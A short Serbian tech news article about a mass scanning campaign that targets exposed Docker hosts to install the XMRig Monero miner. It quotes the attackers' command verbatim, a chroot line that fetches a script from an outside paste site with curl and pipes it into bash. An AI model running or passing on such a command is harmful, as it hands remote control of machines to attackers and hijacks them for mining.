Hakeri u masovnoj potrazi za ranjivostima koje omogućavaju rudarenje Monero valute

Prema poslednjim izveštajima grupa hakera se upustila u masovno skeniranje interneta, a u potrazi za ranjivostima koje bi otvorile vrata za ubacivanje Docker softvera koji služi za rudarenje Monero valute, i to bez znanja žrtava.

PCPress.rs Image

Prema bezbednosnim istraživačima iz agencije Bad Pockets „veliko skeniranje“ je počelo 23. novembra, te služi za detektovanje propusta koji omogućavaju implementaciju malicioznog koda. Ovaj tip aktivnosti je, tvrde eksperti, prilično uobičajen, ali je ova kampanja jedinstvena zbog masovnosti pretrage. Procenjuje se da je kampanja obuhvatila preko 59 hiljada IP mreža, da bi se, kada se ranjivost detektuje, na uređaje otpremao kod chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash, koji potom dalje preuzima skripte sa servera napadača, te na kraju instalira bot-a za rudarenje kriptovaluta – Monero miner XMRig.

Pročitajte i:  Lažna objava Walmart-a uticala na veliki rast Litecoin-a

Od kada je kampanja počela napadači su izrudarili tek 14,8 Monero jedinica, što je oko 740 dolara, ali bi suma mogla da se značajno uveća, budući da se radi o ogromnoj kampanji.

Izvor: TNW

Facebook komentari:

Tagovi: , , , , , ,